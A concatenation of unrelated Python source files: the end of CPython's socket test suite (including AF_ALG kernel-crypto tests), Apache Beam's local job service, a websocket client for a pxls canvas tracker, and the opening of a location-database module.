                    ValueError, "binary mode", meth, file)
        with open(support.TESTFN, 'rb') as file:
            with socket.socket() as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(TypeError, "positive integer",
                                       meth, file, count='2')
                self.assertRaisesRegex(TypeError, "positive integer",
                                       meth, file, count=0.1)
                self.assertRaisesRegex(ValueError, "positive integer",
                                       meth, file, count=0)
                self.assertRaisesRegex(ValueError, "positive integer",
                                       meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
                     'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
    """
    Run the SendfileUsingSendTest suite against the os.sendfile()-based
    implementation of socket.sendfile().
    """
    def meth_from_sock(self, sock):
        # Select the zero-copy sendfile() path instead of plain send().
        return sock._sendfile_use_sendfile
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
    # tests for AF_ALG, the Linux kernel crypto userspace API

    def create_alg(self, typ, name):
        # Return an AF_ALG socket bound to (typ, name), skipping the
        # test when the kernel does not provide that algorithm.
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        try:
            sock.bind((typ, name))
        except FileNotFoundError as e:
            # type / algorithm is not available
            sock.close()
            raise unittest.SkipTest(str(e), typ, name)
        else:
            return sock

    # bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
    # at least on ppc64le architecture
    @support.requires_linux_version(4, 5)
    def test_sha256(self):
        # expected == SHA-256(b"abc"), computed in one shot and then
        # incrementally via MSG_MORE.
        expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
                                 "177a9cb410ff61f20015ad")
        with self.create_alg('hash', 'sha256') as algo:
            op, _ = algo.accept()
            with op:
                op.sendall(b"abc")
                self.assertEqual(op.recv(512), expected)

            op, _ = algo.accept()
            with op:
                # An empty final send() terminates the MSG_MORE sequence.
                op.send(b'a', socket.MSG_MORE)
                op.send(b'b', socket.MSG_MORE)
                op.send(b'c', socket.MSG_MORE)
                op.send(b'')
                self.assertEqual(op.recv(512), expected)

    def test_hmac_sha1(self):
        # Key/message pair is the well-known "Jefe" HMAC test vector
        # (cf. RFC 2202).
        expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
        with self.create_alg('hash', 'hmac(sha1)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
            op, _ = algo.accept()
            with op:
                op.sendall(b"what do ya want for nothing?")
                self.assertEqual(op.recv(512), expected)

    # Although it should work with 3.19 and newer the test blocks on
    # Ubuntu 15.10 with Kernel 4.2.0-19.
    @support.requires_linux_version(4, 3)
    def test_aes_cbc(self):
        key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
        iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
        msg = b"Single block msg"
        ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
        msglen = len(msg)
        with self.create_alg('skcipher', 'cbc(aes)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            # Encrypt a single block (IV sent out-of-band, data streamed
            # with MSG_MORE).
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 flags=socket.MSG_MORE)
                op.sendall(msg)
                self.assertEqual(op.recv(msglen), ciphertext)

            # Decrypt it back.
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg([ciphertext],
                                 op=socket.ALG_OP_DECRYPT, iv=iv)
                self.assertEqual(op.recv(msglen), msg)

            # long message
            multiplier = 1024
            longmsg = [msg] * multiplier
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(longmsg,
                                 op=socket.ALG_OP_ENCRYPT, iv=iv)
                enc = op.recv(msglen * multiplier)
            self.assertEqual(len(enc), msglen * multiplier)
            # CBC: only the first block matches the single-block vector.
            self.assertEqual(enc[:msglen], ciphertext)

            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg([enc],
                                 op=socket.ALG_OP_DECRYPT, iv=iv)
                dec = op.recv(msglen * multiplier)
            self.assertEqual(len(dec), msglen * multiplier)
            self.assertEqual(dec, msg * multiplier)

    @support.requires_linux_version(4, 9)  # see issue29324
    def test_aead_aes_gcm(self):
        key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
        iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
        plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
        assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
        expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
        expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
        taglen = len(expected_tag)
        assoclen = len(assoc)
        with self.create_alg('aead', 'gcm(aes)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
                            None, taglen)

            # send assoc, plain and tag buffer in separate steps
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 assoclen=assoclen, flags=socket.MSG_MORE)
                op.sendall(assoc, socket.MSG_MORE)
                op.sendall(plain)
                res = op.recv(assoclen + len(plain) + taglen)
                # Result layout: assoc data | ciphertext | auth tag.
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # now with msg
            op, _ = algo.accept()
            with op:
                msg = assoc + plain
                op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 assoclen=assoclen)
                res = op.recv(assoclen + len(plain) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # create anc data manually
            pack_uint32 = struct.Struct('I').pack
            op, _ = algo.accept()
            with op:
                msg = assoc + plain
                op.sendmsg(
                    [msg],
                    ([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
                     [socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
                     [socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
                    )
                )
                res = op.recv(len(msg) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # decrypt and verify
            op, _ = algo.accept()
            with op:
                msg = assoc + expected_ct + expected_tag
                op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
                                 assoclen=assoclen)
                res = op.recv(len(msg) - taglen)
                self.assertEqual(plain, res[assoclen:])

    @support.requires_linux_version(4, 3)  # see test_aes_cbc
    def test_drbg_pr_sha256(self):
        # deterministic random bit generator, prediction resistance, sha256
        with self.create_alg('rng', 'drbg_pr_sha256') as algo:
            extra_seed = os.urandom(32)
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
            op, _ = algo.accept()
            with op:
                rn = op.recv(32)
                self.assertEqual(len(rn), 32)

    def test_sendmsg_afalg_args(self):
        # Invalid argument combinations for sendmsg_afalg() must raise.
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        with sock:
            with self.assertRaises(TypeError):
                sock.sendmsg_afalg()
            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(op=None)
            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(1)
            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)

    def test_length_restriction(self):
        # bpo-35050, off-by-one error in length check
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        self.addCleanup(sock.close)
        # salg_type[14]
        with self.assertRaises(FileNotFoundError):
            sock.bind(("t" * 13, "name"))
        with self.assertRaisesRegex(ValueError, "type too long"):
            sock.bind(("t" * 14, "name"))
        # salg_name[64]
        with self.assertRaises(FileNotFoundError):
            sock.bind(("type", "n" * 63))
        with self.assertRaisesRegex(ValueError, "name too long"):
            sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
    """Guard against new TCP_* constants appearing unreviewed (bpo-32394)."""

    # Every TCP_* constant the socket module is expected to expose on Windows.
    knownTCPFlags = {
        # available since long time ago
        'TCP_MAXSEG',
        'TCP_NODELAY',
        # available starting with Windows 10 1607
        'TCP_FASTOPEN',
        # available starting with Windows 10 1703
        'TCP_KEEPCNT',
        # available starting with Windows 10 1709
        'TCP_KEEPIDLE',
        'TCP_KEEPINTVL'
    }

    def test_new_tcp_flags(self):
        unknown = [name for name in dir(socket)
                   if name.startswith('TCP') and name not in self.knownTCPFlags]
        self.assertEqual([], unknown,
                         "New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
    """Unit tests for the socket.create_server() convenience constructor."""

    def test_address(self):
        """The server binds exactly the requested host and port."""
        port = support.find_unused_port()
        with socket.create_server(("127.0.0.1", port)) as sock:
            self.assertEqual(sock.getsockname()[0], "127.0.0.1")
            self.assertEqual(sock.getsockname()[1], port)
        if support.IPV6_ENABLED:
            with socket.create_server(("::1", port),
                                      family=socket.AF_INET6) as sock:
                self.assertEqual(sock.getsockname()[0], "::1")
                self.assertEqual(sock.getsockname()[1], port)

    def test_family_and_type(self):
        """create_server() yields a SOCK_STREAM socket of the chosen family."""
        with socket.create_server(("127.0.0.1", 0)) as sock:
            self.assertEqual(sock.family, socket.AF_INET)
            self.assertEqual(sock.type, socket.SOCK_STREAM)
        if support.IPV6_ENABLED:
            with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
                self.assertEqual(s.family, socket.AF_INET6)
                # Bug fix: assert on the IPv6 socket `s`, not on the
                # already-closed IPv4 socket `sock` from the block above.
                self.assertEqual(s.type, socket.SOCK_STREAM)

    def test_reuse_port(self):
        """reuse_port=True sets SO_REUSEPORT (or raises where unsupported)."""
        if not hasattr(socket, "SO_REUSEPORT"):
            with self.assertRaises(ValueError):
                socket.create_server(("localhost", 0), reuse_port=True)
        else:
            with socket.create_server(("localhost", 0)) as sock:
                opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
                self.assertEqual(opt, 0)
            with socket.create_server(("localhost", 0), reuse_port=True) as sock:
                opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
                self.assertNotEqual(opt, 0)

    @unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
                     not hasattr(_socket, 'IPV6_V6ONLY'),
                     "IPV6_V6ONLY option not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_ipv6_only_default(self):
        """An IPv6 server is v6-only by default (no dual-stack)."""
        with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
            assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dualstack_ipv6_family(self):
        """dualstack_ipv6=True still reports AF_INET6 as the family."""
        with socket.create_server(("::1", 0), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
    """End-to-end checks for socket.create_server(): a background thread
    echoes one connection while the main thread plays the client."""

    timeout = 3

    def setUp(self):
        self.thread = None

    def tearDown(self):
        if self.thread is not None:
            self.thread.join(self.timeout)

    def echo_server(self, sock):
        """Start a thread that accepts one connection and echoes its data."""
        event = threading.Event()

        def serve_one(srv):
            with srv:
                conn, _ = srv.accept()
                with conn:
                    # Wait until the main thread has finished setup.
                    event.wait(self.timeout)
                    data = conn.recv(1024)
                    if data:
                        conn.sendall(data)

        sock.settimeout(self.timeout)
        self.thread = threading.Thread(target=serve_one, args=(sock,))
        self.thread.start()
        event.set()

    def echo_client(self, addr, family):
        """Connect to *addr*, send b'foo' and expect it echoed back."""
        with socket.socket(family=family) as sock:
            sock.settimeout(self.timeout)
            sock.connect(addr)
            sock.sendall(b'foo')
            self.assertEqual(sock.recv(1024), b'foo')

    def test_tcp4(self):
        port = support.find_unused_port()
        with socket.create_server(("", port)) as sock:
            self.echo_server(sock)
            self.echo_client(("127.0.0.1", port), socket.AF_INET)

    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_tcp6(self):
        port = support.find_unused_port()
        with socket.create_server(("", port),
                                  family=socket.AF_INET6) as sock:
            self.echo_server(sock)
            self.echo_client(("::1", port), socket.AF_INET6)

    # --- dual stack tests

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dual_stack_client_v4(self):
        port = support.find_unused_port()
        with socket.create_server(("", port), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.echo_server(sock)
            self.echo_client(("127.0.0.1", port), socket.AF_INET)

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dual_stack_client_v6(self):
        port = support.find_unused_port()
        with socket.create_server(("", port), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.echo_server(sock)
            self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
    """Run every test case class of this module in the original order."""
    tests = [
        GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
        TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
        UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest,
        # Threaded / file-object variants.
        NonBlockingTCPTests,
        FileObjectClassTestCase,
        UnbufferedFileObjectClassTestCase,
        LineBufferedFileObjectClassTestCase,
        SmallBufferedFileObjectClassTestCase,
        UnicodeReadFileObjectClassTestCase,
        UnicodeWriteFileObjectClassTestCase,
        UnicodeReadWriteFileObjectClassTestCase,
        NetworkConnectionNoServer,
        NetworkConnectionAttributesTest,
        NetworkConnectionBehaviourTest,
        ContextManagersTest,
        InheritanceTest,
        NonblockConstantTest,
        # Platform-specific socket families.
        BasicSocketPairTest,
        TestUnixDomain,
        TestLinuxAbstractNamespace,
        TIPCTest, TIPCThreadableTest,
        BasicCANTest, CANTest,
        BasicRDSTest, RDSTest,
        LinuxKernelCryptoAPI,
        BasicQIPCRTRTest,
        BasicVSOCKTest,
        ThreadedVSOCKSocketStreamTest,
        # sendmsg/recvmsg and ancillary-data tests.
        CmsgMacroTests,
        SendmsgUDPTest,
        RecvmsgUDPTest,
        RecvmsgIntoUDPTest,
        SendmsgUDP6Test,
        RecvmsgUDP6Test,
        RecvmsgRFC3542AncillaryUDP6Test,
        RecvmsgIntoRFC3542AncillaryUDP6Test,
        RecvmsgIntoUDP6Test,
        SendmsgTCPTest,
        RecvmsgTCPTest,
        RecvmsgIntoTCPTest,
        SendmsgSCTPStreamTest,
        RecvmsgSCTPStreamTest,
        RecvmsgIntoSCTPStreamTest,
        SendmsgUnixStreamTest,
        RecvmsgUnixStreamTest,
        RecvmsgIntoUnixStreamTest,
        RecvmsgSCMRightsStreamTest,
        RecvmsgIntoSCMRightsStreamTest,
        # These are slow when setitimer() is not available
        InterruptedRecvTimeoutTest,
        InterruptedSendTimeoutTest,
        TestSocketSharing,
        SendfileUsingSendTest,
        SendfileUsingSendfileTest,
        TestMSWindowsTCPFlags,
    ]
    thread_info = support.threading_setup()
    support.run_unittest(*tests)
    support.threading_cleanup(*thread_info)

if __name__ == "__main__":
    test_main()
|
local_job_service.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import logging
import os
import queue
import shutil
import subprocess
import tempfile
import threading
import time
import traceback
from builtins import object
import grpc
from google.protobuf import text_format
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import abstract_job_service
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
_LOGGER = logging.getLogger(__name__)
def _iter_queue(q):
while True:
yield q.get(block=True)
class LocalJobServicer(abstract_job_service.AbstractJobServiceServicer):
  """Manages one or more pipelines, possibly concurrently.
  Experimental: No backward compatibility guaranteed.
  Servicer for the Beam Job API.
  This JobService uses a basic local implementation of runner to run the job.
  This JobService is not capable of managing job on remote clusters.
  By default, this JobService executes the job in process but still uses GRPC
  to communicate pipeline and worker state. It can also be configured to use
  inline calls rather than GRPC (for speed) or launch completely separate
  subprocesses for the runner and worker(s).
  """
  def __init__(self, staging_dir=None):
    """Create the servicer.

    Args:
      staging_dir: directory for staged artifacts; when None a temporary
        directory is created and removed again by stop().
    """
    super(LocalJobServicer, self).__init__()
    # Only delete the staging dir on stop() if we created it ourselves.
    self._cleanup_staging_dir = staging_dir is None
    self._staging_dir = staging_dir or tempfile.mkdtemp()
    self._artifact_service = artifact_service.BeamFilesystemArtifactService(
        self._staging_dir)
    # Populated by start_grpc_server(); None means no staging endpoint yet.
    self._artifact_staging_endpoint = None
  def create_beam_job(self, preparation_id, job_name, pipeline, options):
    """Build (but do not start) a BeamJob for the given pipeline proto."""
    # TODO(angoenka): Pass an appropriate staging_session_token. The token can
    # be obtained in PutArtifactResponse from JobService
    if not self._artifact_staging_endpoint:
      # The front-end didn't try to stage anything, but the worker may
      # request what's here so we should at least store an empty manifest.
      self._artifact_service.CommitManifest(
          beam_artifact_api_pb2.CommitManifestRequest(
              staging_session_token=preparation_id,
              manifest=beam_artifact_api_pb2.Manifest()))
    provision_info = fn_api_runner.ExtendedProvisionInfo(
        beam_provision_api_pb2.ProvisionInfo(
            job_id=preparation_id,
            job_name=job_name,
            pipeline_options=options,
            retrieval_token=self._artifact_service.retrieval_token(
                preparation_id)),
        self._staging_dir)
    return BeamJob(
        preparation_id,
        pipeline,
        options,
        provision_info,
        self._artifact_staging_endpoint)
  def start_grpc_server(self, port=0):
    """Serve the Job and ArtifactStaging APIs; returns the bound port."""
    self._server = grpc.server(UnboundedThreadPoolExecutor())
    # port=0 lets the OS pick a free port; add_insecure_port returns it.
    port = self._server.add_insecure_port('localhost:%d' % port)
    beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
    beam_artifact_api_pb2_grpc.add_ArtifactStagingServiceServicer_to_server(
        self._artifact_service, self._server)
    self._artifact_staging_endpoint = endpoints_pb2.ApiServiceDescriptor(
        url='localhost:%d' % port)
    self._server.start()
    _LOGGER.info('Grpc server started on port %s', port)
    return port
  def stop(self, timeout=1):
    """Stop the gRPC server and remove the staging dir if we created it."""
    self._server.stop(timeout)
    if os.path.exists(self._staging_dir) and self._cleanup_staging_dir:
      shutil.rmtree(self._staging_dir, ignore_errors=True)
  def GetJobMetrics(self, request, context=None):
    """Return the user-level (non-system) metrics of a job.

    Raises:
      LookupError: if request.job_id is unknown.
    """
    if request.job_id not in self._jobs:
      raise LookupError("Job {} does not exist".format(request.job_id))
    result = self._jobs[request.job_id].result
    monitoring_info_list = []
    for mi in result._monitoring_infos_by_stage.values():
      monitoring_info_list.extend(mi)
    # Filter out system metrics
    user_monitoring_info_list = [
        x for x in monitoring_info_list
        if monitoring_infos._is_user_monitoring_info(x) or
        monitoring_infos._is_user_distribution_monitoring_info(x)
    ]
    return beam_job_api_pb2.GetJobMetricsResponse(
        metrics=beam_job_api_pb2.MetricResults(
            committed=user_monitoring_info_list))
class SubprocessSdkWorker(object):
  """Manages a SDK worker implemented as a subprocess communicating over grpc.
  """
  def __init__(self, worker_command_line, control_address, worker_id=None):
    # Shell command line used to launch the worker process.
    self._worker_command_line = worker_command_line
    # Address of the runner's control service, passed via the environment.
    self._control_address = control_address
    self._worker_id = worker_id
  def run(self):
    """Launch the worker subprocess and block until it exits.

    Starts a local gRPC logging service whose address (and the control
    address) are handed to the worker through environment variables as
    text-proto ApiServiceDescriptors.

    Raises:
      RuntimeError: if the worker exits with a non-zero return code.
    """
    logging_server = grpc.server(UnboundedThreadPoolExecutor())
    logging_port = logging_server.add_insecure_port('[::]:0')
    logging_server.start()
    logging_servicer = BeamFnLoggingServicer()
    beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
        logging_servicer, logging_server)
    logging_descriptor = text_format.MessageToString(
        endpoints_pb2.ApiServiceDescriptor(url='localhost:%s' % logging_port))
    control_descriptor = text_format.MessageToString(
        endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
    env_dict = dict(
        os.environ,
        CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor,
        LOGGING_API_SERVICE_DESCRIPTOR=logging_descriptor
    )
    # only add worker_id when it is set.
    if self._worker_id:
      env_dict['WORKER_ID'] = self._worker_id
    with fn_api_runner.SUBPROCESS_LOCK:
      p = subprocess.Popen(
          self._worker_command_line,
          shell=True,
          env=env_dict)
    try:
      p.wait()
      if p.returncode:
        raise RuntimeError(
            'Worker subprocess exited with return code %s' % p.returncode)
    finally:
      # Make sure neither the subprocess nor the logging server outlive us.
      if p.poll() is None:
        p.kill()
      logging_server.stop(0)
class BeamJob(abstract_job_service.AbstractBeamJob):
  """This class handles running and managing a single pipeline.

  The current state of the pipeline is available as self.state.
  """
  def __init__(self,
               job_id,
               pipeline,
               options,
               provision_info,
               artifact_staging_endpoint):
    super(BeamJob, self).__init__(
        job_id, provision_info.provision_info.job_name, pipeline, options)
    self._provision_info = provision_info
    self._artifact_staging_endpoint = artifact_staging_endpoint
    # Consumers register queues here to observe state changes and log
    # messages (see get_state_stream / get_message_stream).
    self._state_queues = []
    self._log_queues = []
    # NOTE(review): this class is not a Thread; `daemon` looks vestigial.
    self.daemon = True
    self.result = None
  def set_state(self, new_state):
    """Set the latest state as an int enum and notify consumers"""
    timestamp = super(BeamJob, self).set_state(new_state)
    if timestamp is not None:
      # Inform consumers of the new state. (Renamed the loop variable so it
      # no longer shadows the imported `queue` module.)
      for state_queue in self._state_queues:
        state_queue.put((new_state, timestamp))
  def prepare(self):
    # Nothing to prepare; all work happens lazily in run().
    pass
  def artifact_staging_endpoint(self):
    return self._artifact_staging_endpoint
  def run(self):
    """Start executing the pipeline on a background thread."""
    self.set_state(beam_job_api_pb2.JobState.STARTING)
    self._run_thread = threading.Thread(target=self._run_job)
    self._run_thread.start()
  def _run_job(self):
    """Body of the run thread: execute the pipeline and track its state."""
    self.set_state(beam_job_api_pb2.JobState.RUNNING)
    with JobLogHandler(self._log_queues):
      try:
        result = fn_api_runner.FnApiRunner(
            provision_info=self._provision_info).run_via_runner_api(
                self._pipeline_proto)
        _LOGGER.info('Successfully completed job.')
        self.set_state(beam_job_api_pb2.JobState.DONE)
        self.result = result
      except:  # pylint: disable=bare-except
        # Bug fix: _LOGGER.exception already records the active traceback;
        # the former second call logged the `traceback` *module* object.
        _LOGGER.exception('Error running pipeline.')
        self.set_state(beam_job_api_pb2.JobState.FAILED)
        raise
  def cancel(self):
    if not self.is_terminal_state(self.state):
      self.set_state(beam_job_api_pb2.JobState.CANCELLING)
      # TODO(robertwb): Actually cancel...
      self.set_state(beam_job_api_pb2.JobState.CANCELLED)
  def get_state_stream(self):
    """Yield (state, timestamp) pairs until a terminal state is reached."""
    # Register for any new state changes.
    state_queue = queue.Queue()
    self._state_queues.append(state_queue)
    for state, timestamp in self.with_state_history(_iter_queue(state_queue)):
      yield state, timestamp
      if self.is_terminal_state(state):
        break
  def get_message_stream(self):
    """Yield log messages and state changes until a terminal state arrives."""
    # Register for any new messages.
    log_queue = queue.Queue()
    self._log_queues.append(log_queue)
    # State changes are interleaved into the same queue as (state, ts) tuples.
    self._state_queues.append(log_queue)
    for msg in self.with_state_history(_iter_queue(log_queue)):
      if isinstance(msg, tuple):
        assert len(msg) == 2 and isinstance(msg[0], int)
        current_state = msg[0]
        yield msg
        if self.is_terminal_state(current_state):
          break
      else:
        yield msg
class BeamFnLoggingServicer(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
  """Receives worker log records over gRPC and forwards them to _LOGGER."""

  def Logging(self, log_bundles, context=None):
    for bundle in log_bundles:
      for entry in bundle.log_entries:
        # Collapse multi-line records so each worker log is a single line.
        _LOGGER.info('Worker: %s', str(entry).replace('\n', ' '))
    return iter([])
class JobLogHandler(logging.Handler):
  """Captures logs to be returned via the Beam Job API.

  Enabled via the with statement."""

  # Mapping from logging levels to LogEntry levels.
  LOG_LEVEL_MAP = {
      logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
      logging.CRITICAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
      logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
      logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
      logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
      logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
  }

  def __init__(self, log_queues):
    super(JobLogHandler, self).__init__()
    # Monotonically increasing id for emitted JobMessages.
    self._last_id = 0
    self._logged_thread = None
    self._log_queues = log_queues

  def __enter__(self):
    # Remember the current thread to demultiplex the logs of concurrently
    # running pipelines (as Python log handlers are global).
    self._logged_thread = threading.current_thread()
    logging.getLogger().addHandler(self)

  def __exit__(self, *args):
    self._logged_thread = None
    # Bug fix: detach from the root logger; close() alone left the handler
    # registered and still receiving records after the job finished.
    logging.getLogger().removeHandler(self)
    self.close()

  def _next_id(self):
    self._last_id += 1
    return str(self._last_id)

  def emit(self, record):
    # Only capture records emitted by the pipeline's own thread.
    if self._logged_thread is threading.current_thread():
      msg = beam_job_api_pb2.JobMessage(
          message_id=self._next_id(),
          time=time.strftime('%Y-%m-%d %H:%M:%S.',
                             time.localtime(record.created)),
          importance=self.LOG_LEVEL_MAP[record.levelno],
          message_text=self.format(record))
      # Inform all message consumers. (Renamed the loop variable so it no
      # longer shadows the imported `queue` module.)
      for log_queue in self._log_queues:
        log_queue.put(msg)
|
websocket_client.py
|
import asyncio
import json
import threading
import websockets
import uuid
from utils.log import get_logger
logger = get_logger("pxls_websocket")
class WebsocketClient:
    """A threaded websocket client to update the canvas board and online count
    in real-time."""

    def __init__(self, uri: str, stats_manager):
        self.uri = uri
        self.stats = stats_manager
        # Private event loop driven by a daemon thread (see start()).
        self.loop = asyncio.new_event_loop()
        self.thread = threading.Thread(target=self._start, daemon=True)
        self._paused = False
        # True while the websocket connection is alive.
        self.status = False

    def start(self):
        """Start the websocket in a separate thread."""
        self.thread.start()

    def _start(self):
        # Runs in self.thread: drive the listener coroutine forever.
        self.loop.run_until_complete(self._listen())

    def pause(self):
        """Pause the websocket."""
        self._paused = True

    def resume(self):
        """Resume the websocket."""
        self._paused = False

    async def _listen(self):
        """Connect (and reconnect forever) to the websocket, dispatching pixel
        and online-count updates to the stats manager."""
        while True:
            pxls_validate = str(uuid.uuid4())
            headers = {"Cookie": f"pxls-validate={pxls_validate}"}
            try:
                async with websockets.connect(
                    self.uri, extra_headers=headers
                ) as websocket:
                    self.status = True
                    logger.info("Websocket connected")
                    async for message in websocket:
                        # Bug fix: the previous `while self._paused: pass`
                        # busy-waited inside the coroutine, starving the event
                        # loop (no pings processed) and burning a CPU core.
                        while self._paused:
                            await asyncio.sleep(0.1)
                        try:
                            message_json = json.loads(message)
                            if message_json["type"] == "pixel":
                                pixels = message_json["pixels"]
                                for pixel in pixels:
                                    if self.stats.board_array is not None:
                                        self.stats.update_board_pixel(**pixel)
                                    if self.stats.virginmap_array is not None:
                                        self.stats.update_virginmap_pixel(**pixel)
                            if message_json["type"] == "users":
                                count = message_json["count"]
                                self.stats.online_count = count
                        except Exception:
                            logger.exception("Websocket client raised")
            except Exception as error:
                # Connection dropped or failed: mark offline and retry.
                self.status = False
                self.stats.online_count = None
                logger.debug(f"Websocket disconnected: {error}")
                logger.debug("Attempting reconnect...")
                await asyncio.sleep(1)
|
locationsDatabase.py
|
import time
import numpy as np
from threading import Thread
import utils
import dbscan
import placesDatabase as placesDB
import userDatabase as userDB
#Distance in meters
minDist = 20
minPoints = 10
#public in database: 0=hidden 1=public for friends, 2=everybody
def storePlacesIdArroundUser(conn, latitude, longitude):
    """Refresh the cached places around (latitude, longitude) when stale.

    If no location row newer than 30 days exists inside a ~110 m box around
    the point, re-fetch the places from Google Maps on a background thread.
    """
    c = conn.cursor()
    #Get the points around aprox 110 m each side (0.001 deg ~ 110 m)
    maxLat = latitude + 0.001
    minLat = latitude - 0.001
    maxLng = longitude + 0.001
    minLng = longitude - 0.001
